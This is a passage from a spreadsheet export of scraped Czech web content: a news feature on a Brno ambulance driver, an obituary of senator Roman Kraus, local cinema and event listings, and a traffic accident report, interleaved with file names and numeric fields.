    <t>Závod o čas: dupnout na brzdu v sanitce nejde Rubrika: Profíci v uniformách Jako při slalomu si občas připadá řidič sanitky Honza Šmarda. Kromě aut zdržují převoz pacientů i závory na parkovištích. Můj čas je pouhopouhé prozatím, zpívá se v titulní písni k seriálu Sanitka. A není to nadsázka. Honza Šmarda jako řidič vozidel zdravotnické záchranné služby dobře ví, že jsou chvíle, kdy čas rozhoduje o životě a smrti. Jednou jeho tým zavolali k nastávající mamince s krvácením. Šlo o vteřiny nejen pro dítě, ale i pro ni. „Udělali jsme základní vyšetření a bylo jasné, že je zle. Tak jsme prostě spěchali do nemocnice. A ono bylo zle,“ vypráví brněnský záchranář. Tento příběh skončil šťastně, protože se včas dostali na operační sál. A zásadní roli sehrálo i Šmardovo řidičské umění. Na starosti nemá pouze cestu, do lidských osudů zasahuje i na místě. Řidiči záchranky totiž v terénu asistují kolegům zdravotníkům při zákrocích, musí tedy ovládat i adekvátní úroveň první pomoci. Jihomoravská záchranná služba si proto své kouzelníky za volantem vychovává sama. Šmarda se k profesi dostal náhodou, je vyučený zedník. Jeho životem zamíchala branná povinnost. „Přiznám se, byl jsem mladý, zamilovaný, nechtělo se mi na vojnu. Tak jsem si podal žádost na civilní službu, že mám odpor ke zbraním, k násilí a ke krvi,“ vzpomíná. Zbraním se sice vyhnul, krvi už ovšem ne. Místo armády se ocitl u převozové služby, která zajišťuje třeba transport pacientů na dialýzu. A spolupracuje i se záchranáři, většinou u hromadných neštěstí. Není tedy divu, že kroky mnohých odtud vedou na záchranku, kde pak absolvují příslušné kurzy. Tak to bylo i u Šmardy, který s „rychlou“ jezdí už dvacet let. A nejde jen o běžné sanitky. Jako člen takzvaného týmu specializovaných činností na základně v brněnských Bohunicích usedá i za volant terénní toyoty či velkokapacitního vozidla určeného pro mimořádné události. Speciální vůz mají záchranáři i pro bariatrické pacienty, tedy ty s morbidní obezitou, a pro pacienty s vysoce nakažlivou nemocí. Ke křižovatkám s opatrností Dramatické zápletky nejsou součástí každé cesty. Dispečink na lince 155 rozlišuje čtyři stupně naléhavosti, které regulují rychlost jízdy. Ty nejnižší v podstatě nahrazují dřívější lékařskou výjezdní pohotovost a často se týkají případů, kdy lidé volají sanitku v situacích, které by mohli řešit sami. Záchranáři se tak někdy během dvanáctihodinové směny vůbec nevrátí na základnu, protože ještě při zpáteční cestě je volají k novým případům. Pro Šmardu není výjimkou ani devět výjezdů za službu. Pokud operátoři nahlásí nejvyšší naléhavost 1A, začíná závod o život. Tam už se na sanitku žádná omezení rychlosti nevztahují. A obzvlášť tehdy do hry vstupují i ostatní účastníci provozu. Ke šťastnému konci pomáhá záchranářská ulička, kdy auta vytvoří pro vozidla integrovaného záchranného systému koridor pro rychlý a bezpečný průjezd. „Myslím, že na dálnicích se to už řidiči celkem naučili, tam si asi nemůžeme stěžovat,“ hodnotí přispění veřejnosti řidič-záchranář. O dalších silnicích to však říct nemůže. Ve městech sanitka naráží na nepozorné či bezohledné řidiče i cyklisty. Někteří chodci si zase na přechodu ťukají na čelo, jako by spěch záchranářů nechápali. Šmarda si tak někdy připadá jako při slalomu. Ke křižovatkám se přibližuje už z dálky opatrně pro případ, že někdo nepostřehl houkání ani světelnou signalizaci sanitky. Někdy totiž musí zpomalit i o šedesát kilometrů v hodině, a pokud veze pacienta, prudké sešlápnutí brzdy nepřipadá v úvahu. Problém je také s odstupy aut mezi sebou. Při dopravních omezeních, jako byla ta kvůli stavbě tunelů v brněnské ulici Žabovřeská, si řidiči nechávají prostor pouze na to, aby se vzájemně pustili do zúžení. Čtyřiačtyřicetiletý kočí „jednotky intenzivní péče na kolečkách“ nad tím krčí rameny. „Lidé už nepřemýšlí, že by si měli trošku držet místo na to, kdyby potřebovali uhnout,“ podotýká. Příliš těsné parkování Když na vozovce zrovna není místo, kam se uklidit před sanitkou, je rada jednoduchá: prostě jet dál a uhnout až tam, kde to možné je. „Jde o to, hledat ten nejširší prostor. Také je důležité, aby lidé dali najevo, že o nás vědí, ideálně pomocí blinkru. Uhýbají doprava, tak vyhodí blinkr doprava. Já vím, že o mně vědí, a objedu je zleva,“ vysvětluje Šmarda. „Ale celkově se to rozhodně zlepšuje,“ uznává. Důležité minuty šoférům sanitek a jejich pacientům kradou i jiné překážky. Na některých sídlištích stojí auta tak nevhodně, že mezi nimi sotva jde projet. Někde to vyřešilo rezidentní parkování, ale vyvstal zase jiný problém, například v ulici Oblá. Vozy jsou tam na parkovišti napěchované tak těsně, že mezi nimi záchranáři s nezbytným vybavením neprojdou. „Musíme obejít třeba třicet aut, než se dostaneme s nosítky na chodník. A někdy neprojdeme ani s batohy,“ přibližuje Šmarda. Potíže někdy bývají i se závorami. Zatímco ve velkých obchodních centrech je většinou nepřetržitě hlídá obsluha, která záchranáře pustí, na soukromých parkovištích to tak nefunguje. „Když si při vjezdu vezmu lístek a něco tam dělám, jsem tam třeba dvacet minut, ale volné parkování platí jenom na patnáct. Pak přijedu k závoře, chci vyjet a lístek mi nefunguje. Tak zvoním na obsluhu, která sedí daleko a nereaguje,“ popisuje Šmarda úskalí. Zatím se mu to nestalo u závažných případů, ale kdyby šlo o život, jediným řešením by bylo poškodit majetek, což by pak šlo na jeho účet. Čas je ovšem u akutních případů k nezaplacení, jak koneckonců vyznívá i ze zmíněné skladby ze seriálu Sanitka. Šmarda ji ostatně sám před časem měl jako vyzvánění na mobilu. Když všechno dobře dopadne, lidé dokážou projevit vděk. Maminka, kterou zachránili včasným transportem na operační sál, přišla svým hrdinům později s dcerou i manželem osobně poděkovat. Nedávno zase Šmarda šel s kamarádem na pivo a potkal povědomého pána – ukázalo se, že ho předtím vezl kvůli bolavým zádům. Když pak šel řidič sanitky v hospodě zaplatit, zjistil, že už není co. Jiné paní zase před lety pomohl zachránit život krátce předtím, než se jí narodilo vnouče. Před Vánocemi pak dostal dopis, v němž dotyčná děkovala za čas, který může s vnoučaty strávit. Instrukce Co dělat, když okolo spěchá sanitka ● Pokud byste zastavením zablokovali silnici, raději jeďte dál. Ideálně hledejte nejširší místo, kde uhnete. ● Jestliže je nutné popojet přes červenou na semaforu, vyjet na chodník nebo vyrazit na kruhový objezd, učiňte tak. Nezapomínejte ovšem na vlastní bezpečí. ● Pokud můžete, uhýbejte do pravého pruhu, aby zrychlený levý pruh zůstal volný pro sanitku. ● Pamatujte, že pro bezpečný průjezd všech vozidel integrovaného záchranného systému (IZS) jsou potřeba tři metry. ● Dejte najevo řidiči sanitky, že o ní víte, tedy vyhozením blinkru. ● Buďte obezřetní, protože může jet víc vozů IZS za sebou. ● Udržujte si odstup od ostatních aut kdekoliv v provozu, abyste v případě potřeby mohli vytvořit záchranářskou uličku. ● Chodci a cyklisté, při průjezdu sanitky nevstupujte a nevjíždějte do křižovatky, ani pokud máte zelenou. Setrvejte na chodníku nebo u krajnice. Dvacet let u „rychlé“ Kromě toho, že sanitku musí co nejdřív dostat do cíle, pomáhá Honza Šmarda s první pomocí v terénu. Foto: Radim Strachoň, MAFRA Poděkování Maminka i s manželem přišla Honzovi Šmardovi s kolegou vyjádřit vděk za záchranu při komplikovaném porodu její dcery. Foto: ZZS JMK Autor: Zuzana Motalová redaktorka MF DNES Autor person Zuzana Motalová Rubrika transition_slide Profíci v uniformách</t>
  </si>
  <si>
    <t>48510</t>
  </si>
  <si>
    <t>20241101_606_3241157594_f965c6cecea70eca8e67.html</t>
  </si>
  <si>
    <t>f965c6cecea70eca8e67</t>
  </si>
  <si>
    <t>Rázný a férový. Krause oceňují lékaři i politici</t>
  </si>
  <si>
    <t>Rázný a férový. Krause oceňují lékaři i politici Úspěšně vedl dvě největší brněnské nemocnice, zasedal v Senátu. Náhle zemřelého Romana Krause označují kolegové za výjimečného muže. BRNO Teprve předevčírem jej na ustavující schůzi nového Senátu potvrdili coby předsedu výboru pro zdravotnictví . Další den už však na své místo neusedl. Roman Kraus ve středu večer nečekaně podlehl plicní embolii. Na brněnské Nové radnici proto od včerejška visí černá vlajka, senátoři jeho památku uctili minutou ticha. Lékař a bývalý ředitel obou brněnských fakultních nemocnic podle svých spolupracovníků pozitivně ovlivnil životy mnoha lidí a vystupoval jako férový, ochotný člověk s nadhledem. „Když jsem začínal u svaté Anny, vnímal jsem ho jako velmi laskavého člověka. Pokud jsme za ním přišli s nějakou vizí nebo nápadem, nikdy nás neodmítl. Naopak, často se pro to nadchnul a byl ochotný to za všech okolností dotáhnout do konce. Že nás poslouchá, pro nás byla velká věc, byl totiž velké jméno,“ vzpomíná Petr Šťourač, proděkan Lékařské fakulty Masarykovy univerzit pro rozvoj a studium v klinických oborech všeobecného lékařství. S Krausem se setkával přes dvacet let, za tu dobu jejich profesní vztah přerostl do blízkého přátelství. „Roman byl golfista, a pokud mu to pracovní povinnosti dovolily, rád si zahrál. Společně jsme před třinácti lety zahájili tradici benefičních golfových turnajů. Doteď rád vzpomínám především na ten první. Neskutečně pršelo, byli jsme zmrzlí na kost, vůbec nám to nešlo, ale i tak jsme si to velmi užili,“ popisuje Šťourač, podle nějž si Kraus nenechal jen tak pokazit náladu. K tomu, aby se z něj stal výjimečný doktor, měl předpoklady už při studiu na brněnské lékařské fakultě. Odpromoval s červeným diplomem, své první zkušenosti v oblasti anesteziologie začal nabírat ve vyškovské nemocnici. Odtud se přesunul do Fakultní nemocnice u svaté Anny v Brně ( FNUSA ), kde se v roce 1994 stal náměstkem ředitelky pro chirurgické obory a v roce 2005 ředitelem celého špitálu. V té době se angažoval především na anesteziologicko-resuscitačním oddělení, kde si vybudoval pozici odborníka, od něhož mnoho doktorů toužilo čerpat zkušenosti. Mezi nimi i současný ředitel krajské společnosti Jihomoravská zdravotní a bývalý šéf FNUSA Martin Pavlík. „Učil jsem se od něj, byl to můj první šéf. Vzpomínám na něj jako na výjimečného klinika a experta na intenzivní péči,“ zmiňuje. V čele FNUSA se Kraus dlouho neohřál, v roce 2007 usedl do křesla ředitele Fakultní nemocnice Brno v Bohunicích . Obě instituce prošly pod jeho vedením významným rozvojem a modernizací, díky čemuž získaly respekt nejen v domácím zdravotnictví, ale i na evropské úrovni. Nadhled i zkušenost Přátelské vztahy s Krausem udržovala Masarykova univerzita, z níž do obou brněnských fakultních nemocnic míří na praxi studenti lékařské fakulty. Rektor Martin Bareš na něm oceňoval především otevřenost při jednáních. Stejného názoru je i děkan lékařské fakulty Martin Repko . „Z lidské stránky jsem ho mohl blíže poznat v době, kdy se mi dostalo cti stát se jeho operatérem. Byl laskavý, férový a otevřený,“ sděluje s tím, že zároveň byl Kraus jako ředitel vždy rázný. „I když jste ne vždy odcházel z jednání s tím, že splnilo vaše osobní požadavky, věděl jste, že jeho rozhodnutí můžete věřit a je pro chod celé instituce tím nejlepším možným člověkem,“ oceňuje Repko . Druhou největší nemocnici v Česku vedl Kraus dvanáct let. V té době tam v roli řadového lékaře působil i Karel Zitterbart (STAN), jenž se stal později i jeho kolegou v Senátu. „Romana jsem nejprve vnímal jako úspěšného pragmatika v nelehké roli ředitele nemocnice. Poté, co jsem ho lépe poznal, dokážu říct, že měl nadhled, zkušenost a byl to férový chlap. Navíc byl v dobrém slova smyslu autentický pravicový politik. Bude tu chybět,“ vzkazuje Zitterbart. Když se předevčírem senátoři shodli na potvrzení Krause jako předsedy výboru, sršel podle Jiřího Duška ( ODS ) optimismem. „On se vždycky smál, byl to pohodový člověk. Měl velmi rád červené víno , občas jsme si spolu dali sklenku. Mohu na něj vzpomínat jen v dobrém,“ oznamuje Dušek, který na svém kolegovi nejvíc obdivoval rozhled a zkušenosti s medicínou i vedením nemocnic. „To se jen tak u někoho nevidí. Byl to inspirativní člověk,“ podotýká. Dokázal změnit názor Senátorské křeslo získal Kraus v barvách ODS v roce 2020, když v Brně ve druhém kole porazil bývalou veřejnou ochránkyni práv Annu Šabatovou (za Zelené, SEN 21 a Idealisty). V politice se ovšem angažoval téměř třicet let, k občanským demokratům se přidal už v roce 1995. A stejně jako v lékařské branži, i v politice získal respekt a pověst férového člověka. „Skvělý lékař, vynikající ředitel brněnských fakultních nemocnic , respektovaný senátor, kamarád. Romana jsem znal dlouho, vážil jsem si jeho názorů, kompetence, rozhledu, klidu a energie, s níž se snažil prosazovat potřebné změny ve zdravotnictví. Je to velká ztráta pro ODS i pro českou politiku,“ napsal na sociální síť X premiér Petr Fiala ( ODS ). Podle dalšího spolustraníka Jindřicha Vobořila byl Kraus mužem, jenž celý život tvrdě pracoval a zároveň měl pokoru. „Ačkoliv byl zástupcem starší generace, měl vždy mladého ducha a otevřenou mysl. Pokud měl na určité věci jiný pohled, vždy dokázal vyslechnout argumenty protistrany, a pokud mu dávaly smysl, byl ochotný svůj názor změnit. To se mi líbí víc než lidé, kteří křičí a bouchají do stolu,“ vyzdvihuje bývalý národní protidrogový koordinátor. Jako příklad zmiňuje otázku legalizace konopí, s níž Kraus nejprve nesouhlasil. Dokázal však vyslechnout názory ostatních a svůj postoj nakonec změnil. „Přál bych si, aby byl každý politik jako on. Zůstane po něm velká díra. Takový člověk tady není. Nikde,“ smutní Vobořil . Rozhovor s Jindřichem Vobořilem čtěte na brno.idnes.cz Fakta Brno čekají doplňující volby V jasné vítězství proměnil před čtyřmi lety lékař a bývalý ředitel obou brněnských fakultních nemocnic Roman Kraus ( ODS ) druhé kolo senátních voleb v brněnském obvodu číslo 60. Finální souboj vyhrál nad bývalou ombudsmankou Annou Šabatovou (za Zelené, SEN 21 a Idealisty). Coby senátor měl Kraus působit šest let, po středečním náhlém úmrtí však volební období nedokončí. Po zbývající zhruba dva roky usedne v horní komoře parlamentu jeho nástupce, který vzejde z doplňovacích voleb. Ty je prezident Petr Pavel podle zákona povinen vyhlásit tak, aby se uskutečnily do 90 dnů. Nového senátora zvolí lidé žijící v Jundrově , Žabovřeskách , Králově Poli, Brně -sever a v dalších částech na severu města. Doplňující klání bude standardně dvoukolové, pokud žádný kandidát nezíská v první fázi víc než polovinu hlasů. Kromě Šabatové za sebou Kraus před čtyřmi lety nechal i Karla Raise (za ANO), Jiřího Kadeřávka (Piráti) či Tomáše Tomáše (KDU-ČSL). (uza) Přál bych si, aby byl každý politik jako on. Zůstane po něm velká díra. Takový člověk tady není. Vrcholný manažer Fakultní nemocnici Brno vedl Roman Kraus dvanáct let, předtím dva roky šéfoval i nemocnici u svaté Anny. 2x foto: MAFRA Politický úspěch Roman Kraus oslavuje s hercem Bolkem Polívkou vítězství v senátních volbách v roce 2020, vlevo na snímku jeho manželka. Autor: Karolína Kučerová s přispěním Oldřicha Haluzy Autoři Oldřich Haluza person Karolína Kučerová</t>
  </si>
  <si>
    <t>20241101_607_3239961677_e71983ca7463fd7f9138.html</t>
  </si>
  <si>
    <t>e71983ca7463fd7f9138</t>
  </si>
  <si>
    <t>Ženy s odvahou</t>
  </si>
  <si>
    <t>Ženy s odvahou Kdy: 15. 11. 2024 19:00 - 21:30 Kde: Kino Beseda Iniciátory projektu Ženy s odvahou jsou tvůrci filmu Zápisník alkoholičky - režisér a producent Dan Svátek a také spoluautorka scénáře, oceňovaného blogu a autorka knižní předlohy filmu Michaela Duffková. Typ akce: kino-film (drama (film), drama (film)) Co vás čeká v kině? V rámci projekce filmu Zápisník alkoholičky, která proběhne v našem kině 15.11.2024 se můžete těšit také na doprovodný program, kterým bude povídání s adiktologem a odborníkem v oblasti závislostí a také samotným režisérem filmu Danem Svátkem . Cílem večera není strašit ani moralizovat, tvůrci kampaně chtějí pouze ukázat, že alkohol se může vymknout z ruky každému z nás a není důvod se za to stydět. Přijďte a podpořte Ženy s odvahou. Více o projektu najdete také na:www.zenysodvahou.cz Celková délka večera je 150 minut a není vhodný do 15 let. Kino Beseda, Palackého nám. 4, Dačice , 38001 Časová náročnost Datum vložení: 28. 10. 2024 22:19 Datum poslední aktualizace: 7. 11. 2024 10:26 Autor: Město Autor: Autor: || Město Dačice</t>
  </si>
  <si>
    <t>927</t>
  </si>
  <si>
    <t>1.01</t>
  </si>
  <si>
    <t>20241101_608_3239961678_7a59b432693a80de184b.html</t>
  </si>
  <si>
    <t>7a59b432693a80de184b</t>
  </si>
  <si>
    <t>Snoubení vína a čokolády - Marcela Krčálová</t>
  </si>
  <si>
    <t>Snoubení vína a čokolády - Marcela Krčálová Videem můžete otáčet a rozhlížet se plně v 360 ° K prohlížení je zapotřebí nejnovější verze webového prohlížeče (Chrome, Opera, Firefox, IE) Nová aplikace do mobilních telefonů pro občany Poběžovic . Aplikaci lze stáhnout z Google Play nebo App Store, popř. načtením zobrazeného QR kódu. mesto/aktuality-2/aplikace-pobezovice-1420cs.html dnes, pátek 8. 11. 2024 jasno Autor: Autor: || Město Poběžovice || Správce Webu</t>
  </si>
  <si>
    <t>89</t>
  </si>
  <si>
    <t>214</t>
  </si>
  <si>
    <t>20241101_609_3239958127_15db5a3874056afd897d.html</t>
  </si>
  <si>
    <t>15db5a3874056afd897d</t>
  </si>
  <si>
    <t>GLADIÁTOR II</t>
  </si>
  <si>
    <t>GLADIÁTOR II město Vítkov MĚSTO V PŘÍRODĚ Město Vítkov se nachází ve Slezsku v okrese Opava , v Moravskoslezském kraji. Leží v terénu Vítkovské vrchoviny na úpatí Nízkého Jeseníku . Žije zde přibližně 5 670 obyvatel. Vítkov je pro jižní Opavsko obec s rozšířenou působností; její správní obvod zahrnuje 12 obcí. Městem protéká potok Čermná. Rychlé odkazy Snadno dostupné informace z našich stránek, které by vás mohly zajímat! Kdy: 15. 11. 2024 19:00 Kde: Kino Panorama Vítkov Koloseum znovu otevírá své brány. Bezmála čtvrtstoletí poté, co ho svou krví skrápěl legendární gladiátor Maximus, ocitne se v aréně další válečník, který otřese základy samotného Říma . Opět u toho bude legendární režisér Ridley Scott . Typ akce: kino-film (akční film, historický film) Bezbariérový vstup na akci Koupit vstupenku - https://shop.entradio.cz/event/15822 Lucius (Paul Mescal), vnuk císaře Marka Aurelia a syn „prvního“ gladiátora Maxima, žije v utajení v jednom z posledních svobodných měst na severu Afriky . Rozpínavá Římská říše ho však nenechá na pokoji. Stačí jeden masívní útok loďstva vedeného generálem Acaciem ( Pedro Pascal ) a prosperující město se změní v ruiny a svobodný Lucius v bezejmenného otroka. Urostlého zajatce si všimne organizátor gladiátorských zápasů Macrinus ( Denzel Washington ), který z něj chce mít hvězdu Římského kolosea (než ho nahradí někdo schopnější). Gladiátorské hry však nejsou tou hlavní hrou, kterou Marcinus hraje. Důmyslný stratég si uvědomuje slabost impéria ovládaného dvěma šílenými císaři, Caracallou a Getou, a rozehraje riskantní partii, v níž na pomyslné šachovnici bojují gladiátor a také právoplatný dědic římského trůnu Lucius, jeho matka Lucilla ( Connie Nielsen , která si zopakovala roli z prvního dílu) a generál Acacius, její manžel a zároveň muž, kterého její syn k smrti nenávidí, protože mu zničil život. Blíží se střet, při kterém krev nepoteče jen Koloseem, ale i ulicemi Říma . Legendární režisér Ridley Scott přivede druhého Gladiátora do kin skoro 25 let po přelomovém filmu s Russellem Crowem. Ten v českých kinech vidělo skoro 450 tisíc diváků. Režisér uznává, že přijít po takové době s pokračováním, může působit podezřele. „Přitom to bylo tak jednoduché a logické. Věděl jsem, kdo přežil, kdo vás tím příběhem povede a kam se v něm vydá,“ říká. Scott považuje Gladiátora II za svůj vůbec nejlepší film. „Říkám to proto, abych vystrašil konkurenci. Ale ne, je fakt dobrý,“ dodává. Akční, historický. Země původu: USA Přístupnost: 15+ Délka: 150 min Český dabing Ochutnávka piva Vikštejn Kino Panorama Vítkov, Komenského 139, Vítkov , 74901 Cena Datum vložení: 18. 10. 2024 9:01 Datum poslední aktualizace: 25. 10. 2024 10:00 Autor: Jan Dušek Autor: Jan Dušek Autor person Jan Dušek</t>
  </si>
  <si>
    <t>563</t>
  </si>
  <si>
    <t>149</t>
  </si>
  <si>
    <t>20241101_61_3265225653_6416e5320a41f3b5cd50.html</t>
  </si>
  <si>
    <t>6416e5320a41f3b5cd50</t>
  </si>
  <si>
    <t>Opilý řidič boural do stromu. Nehoda tří vozidel na křižovatce u Brodu zkomplikovala dopravu.</t>
  </si>
  <si>
    <t>Shrnutí Opilý řidič boural do stromu. Nehoda tří vozidel na křižovatce u Brodu zkomplikovala dopravu. 1. listopadu 2024 (17:45) Dalších 5 fotografií v galerii foto: HZS Středočeského kraje / se souhlasem Páteční odpoledne je znovu ve znamení dopravních nehod. Ve 14:40 naboural opilý řidič do stromu u obce Pečičky. O půl hodiny později došlo ke srážce tří vozidel na křižovatce Brod u Příbrami. Záchranné složky IZS mají dnes odpoledne napilno. Bourá se na různých místech příbramského okresu, naštěstí bez větších zdravotních komplikací účastníků nehody. Ve 14:40 byla na linku 112 nahlášena dopravní nehoda osobního automobilu do stromu. K nárazu došlo na silnici 11818 nedaleko obce Pečičky. Řidič vozidla Citroën (ročník 1986) zřejmě nepřizpůsobil rychlost, vyjel mimo komunikaci a narazil do stromu. Z vozidla mu pomohl okolo jedoucí řidič jiného vozidla. Po příjezdu policie na místo vyšlo najevo, že nepřiměřená reakce řidiče za volantem měla svůj důvod. Dechová zkouška prokázala 1,5 promile alkoholu v krvi. Samotný řidič byl zdravotně v pořádku, utrpěl pouze šok. foto: HZS Středočeského kraje / se souhlasem Krátce po 15 hodině došlo k další nepříjemné situaci na nechvalně vyhlášené křižovatce Brod u Příbrami. Řidička osobního automobilu Škoda (ročník 2001), jedoucí směrem od Milína, přehlédla při odbočování na Příbram protijedoucí vozidlo Renault (řidič ročník 1971) a došlo ke srážce. Nárazem došlo k odmrštění vozidel, které způsobilo střet s dalším vozidlem Suzuki (řidič ročník 1972). Nikdo nebyl vážně zraněn, jedna osoba utrpěla lehké poranění ruky. Policie řídila dopravu kyvadlově, neboť vozidla bránila provozu a čekalo se na jejich odtah. Fotogalerie</t>
  </si>
  <si>
    <t>26600</t>
  </si>
  <si>
    <t>5680</t>
  </si>
  <si>
    <t>20241101_610_3239958034_176de9eb2eed58127963.html</t>
  </si>
  <si>
    <t>176de9eb2eed58127963</t>
  </si>
  <si>
    <t>Zápisník alkoholičky</t>
  </si>
  <si>
    <t>Zápisník alkoholičky Kdy: 15. 11. 2024 19:00 - 21:30 Kde: Kino Beseda Přidat do Google kalendáře Co vás čeká v kině? V rámci projekce filmu Zápisník alkoholičky, která proběhne v našem kině 15.11.2024 se můžete těšit také na doprovodný program, kterým bude povídání s adiktologem a odborníkem v oblasti závislostí a také samotným režisérem filmu Danem Svátkem . Cílem večera není strašit ani m Typ akce: kino-film (drama (film), drama (film)) Nový celovečerní film Zápisník alkoholičky vypráví dramatický příběh mladé ženy bojující se závislostí na alkoholu . Hlavní hrdinkou (byť se jako hrdinka mnohdy nepůsobí) je mladá maminka, která se rozhodla nevzdat, nastoupit léčbu a bojovat se svým démonem i o svou rodinu. Jak těžké je si problém s pitím přiznat? Proč není překážkou závislosti ani malé dítě? Kde vzít sílu se léčit a co následuje poté? Na tyto a mnohé další otázky odpovídá autentická a upřímná filmová zpověď abstinující alkoholičky. (Film uvádíme v českém znění a není vhodný do 15 let.) Kino Beseda, Palackého nám. 4, Dačice , 38001 Časová náročnost Datum vložení: 10. 6. 2024 13:36 Datum poslední aktualizace: 28. 10. 2024 22:19 Autor: Město Autor: Autor: || Město Dačice</t>
  </si>
  <si>
    <t>20241101_611_3239961579_a6854b667ff2005530ec.html</t>
  </si>
  <si>
    <t>a6854b667ff2005530ec</t>
  </si>
  <si>
    <t>Co</t>
  </si>
  <si>
    <t>Co Po 18.11.2024 - Pá 22.11.2024, 13:00 Zažehlovací korálky Út 19.11.2024 - Pá 22.11.2024, 13:00 Sádrové odlitky Autor: Město Bohumín</t>
  </si>
  <si>
    <t>2250</t>
  </si>
  <si>
    <t>1450</t>
  </si>
  <si>
    <t>20241101_612_3239961435_27faf73920cacf27a5fb.html</t>
  </si>
  <si>
    <t>27faf73920cacf27a5fb</t>
  </si>
  <si>
    <t>Svatomartinská slavnost</t>
  </si>
  <si>
    <t>Svatomartinská slavnost Kdy: 11. 11. 2024 16:30 Kde: Státní hrad Šternberk Pracovníci a studenti Gymnázia Šternberk zvou všechny dne 11. listopadu na Svatomartinskou slavnost, která začíná průvodem z Hlavního náměstí a pokračuje bohatým kulturním programem na hradě. V průběhu slavnosti si můžete zakoupit chutné výrobky našich studentů a také produkty ve stáncích. Typ akce: ostatní (akce pro celou rodinu, akce pro veřejnost, slavnost) Akce je vhodná pro děti K dispozici bude i svatomartinské víno . V každou celou hodinu budou mít účastnící slavnosti možnost jít na prohlídku hradu za snížené vstupné. Bližší podrobnosti najdete na plakátu a na webu: https://gymst.edupage.org/ Svatomartinská slavnost 2 Státní hrad Šternberk , Horní náměstí 6, Šternberk , 78501 Gymnázium Šternberk Datum vložení: 13. 12. 2023 9:37 Datum poslední aktualizace: 8. 10. 2024 9:39 Autor: Bohumil Návrat Sledujte informace z našeho webu v mobilní aplikaci – V OBRAZE. Exporty do RSS Autor: Bohumil Návrat Autor person Bohumil Návrat</t>
  </si>
  <si>
    <t>736</t>
  </si>
  <si>
    <t>553</t>
  </si>
  <si>
    <t>20241101_613_3239961558_a844d6c3ccb3237794f9.html</t>
  </si>
  <si>
    <t>a844d6c3ccb3237794f9</t>
  </si>
  <si>
    <t>VEČER S CIMBÁLOVOU MUZIKOU KUNOVJAN Kdy: 22. 11. 2024 19:00 Kde: MKS Velký sál Koncert, tančírna a degustace s povídáním o víně z Vinařství Medek Typ akce: hudba (cimbálová hudba, cimbálová hudba, cimbálová hudba, cimbálová hudba, cimbálová hudba, cimbálová hudba, cimbálová hudba) Přijďte si s námi zazpívat, zatančit… a k tomu bez pochyb patří i dobré víno … Začínáme koncertem velké krojované muziky v 19:00, po 20. hodině se přesuneme do zážitků plných vůní a chutí s vinařem Jožkou Medkem z Uherského Hradiště a do pozdních nočních hodin nám pak cimbálová muzika zahraje na pěknou notečku a hodí i něco pod nohy. Přijďte si s námi užít večer plný hudby, vína , tance a Vás, dobrých lidí! Základní vstupenka platí pro koncert a tančírnu. Pro účast na degustaci s povídáním o víně je nutno zakoupit zvláštní vstupenku. Předprodej vstupenek od pondělí 14. října v infocentru na Chodském náměstí 96 a on-line. . Autor: Autor: || Město Poběžovice</t>
  </si>
  <si>
    <t>20241101_614_3239958097_a68a02ac5dcce6dd3c1e.html</t>
  </si>
  <si>
    <t>a68a02ac5dcce6dd3c1e</t>
  </si>
  <si>
    <t>Co Po 18.11.2024 - Pá 22.11.2024, 13:00 Zažehlovací korálky Autor: Město Bohumín</t>
  </si>
  <si>
    <t>20241101_615_3239957962_74080ac1f421cbeb0737.html</t>
  </si>
  <si>
    <t>74080ac1f421cbeb0737</t>
  </si>
  <si>
    <t>Střední Amerika</t>
  </si>
  <si>
    <t>Střední Amerika město Vítkov MĚSTO V PŘÍRODĚ Město Vítkov se nachází ve Slezsku v okrese Opava , v Moravskoslezském kraji. Leží v terénu Vítkovské vrchoviny na úpatí Nízkého Jeseníku . Žije zde přibližně 5 670 obyvatel. Vítkov je pro jižní Opavsko obec s rozšířenou působností; její správní obvod zahrnuje 12 obcí. Městem protéká potok Čermná. Rychlé odkazy Snadno dostupné informace z našich stránek, které by vás mohly zajímat! Kdy: 4. 11. 2024 17:30 Kde: Městská knihovna Vítkov Cestovatelská beseda - Deny a Carol 6 zemí – 8 000 km – 128 dní Typ akce: ostatní (přednáška, přednáška, přednáška) Bezbariérový vstup na akci Přednáška o 4-měsíční cestě střední Amerikou plné zážitků (hezkých, ale i těch horších). Procestovaly jsme země Belize , Guatemala , Salvador , Nikaragua , Kostarika a Panama . Plavaly jsme s rejnoky a žraloky, letěly Cessnou nad Blue Hole, vylezly na vrcholy mnoha hor, vysokých mayských pyramid i sopek (jednu jsme sjely dolů na bobech), propluly jsme na kánoji obětní mayskou jeskyni, zchladily se pod mnoha vodopády, bloudily nádhernou džunglí, pozorovaly jsme krásnou flóru i faunu a ochutnaly spoustu tradičních jídel. Mnoho času jsme strávily v přítomnosti místních obyvatel, od kterých jsme čerpaly informace o dané lokalitě, zvycích, nebo třeba víře, abychom vám mohly zprostředkovat co nejzajímavější postřehy z těchto zemí. Koupit vstupenky - https://shop.entradio.cz/event/16787 Deny a Carol Jsme holky, které si plní sny a užívají života. Nejčastěji cestujeme na Americký kontinent, který nás naprosto uchvátil. O našich zážitcích povídáme na cestovatelských přednáškách, píšeme články do magazínů a létáme s dronem. Během poznávání zemí se zaměřujeme na sociální situaci, která je nám díky studiu velmi blízká. Zapojujeme se do charitativních projektů. Carol Carol je ambiciózní puntičkářka, která žije svými diáři a excelovými tabulkami. 360 dní v roce obědvá brambory na všechny způsoby. Píše zajímavosti k filmům a biografie. Od zří let bruslí na inlinech a učí se jezdit na skateboardu. Miluje boho styl, americké sporty, tvarůžky, sbírá drahý alkohol za úspěchy (ale nepije), lapače snů a vánoční svetry. Studuje španělštinu a Harryho Pottery přečetla sedmnáctkrát. Deny Deny je hyperaktivní usměvavá osoba, která miluje všechno sladké. Je schopná sníst dvě čokolády za den (a tvrdit, že sladké rapidně omezuje). Poslouchá hudbu, pije kávu, čte cestovatelské knihy, hraje na ukulele, studuje španělštinu a sbírá vršky od piva . Už jich má stoky z různých států světa. Ráda plete macramé, vaří a peče, plave a šnorchluje. Díky své zbrklosti má obden nějaké nové škrábnutí, nebo modřinu. Městská knihovna Vítkov , Selská 335, Vítkov , 74901 Cena Datum vložení: 29. 10. 2024 12:13 Datum poslední aktualizace: 30. 10. 2024 14:56 Autor: Jan Dušek Autor: Jan Dušek Autor person Jan Dušek</t>
  </si>
  <si>
    <t>20241101_616_3239958100_f9a6a489e547189ee235.html</t>
  </si>
  <si>
    <t>f9a6a489e547189ee235</t>
  </si>
  <si>
    <t>Strepsils sleva až 20%</t>
  </si>
  <si>
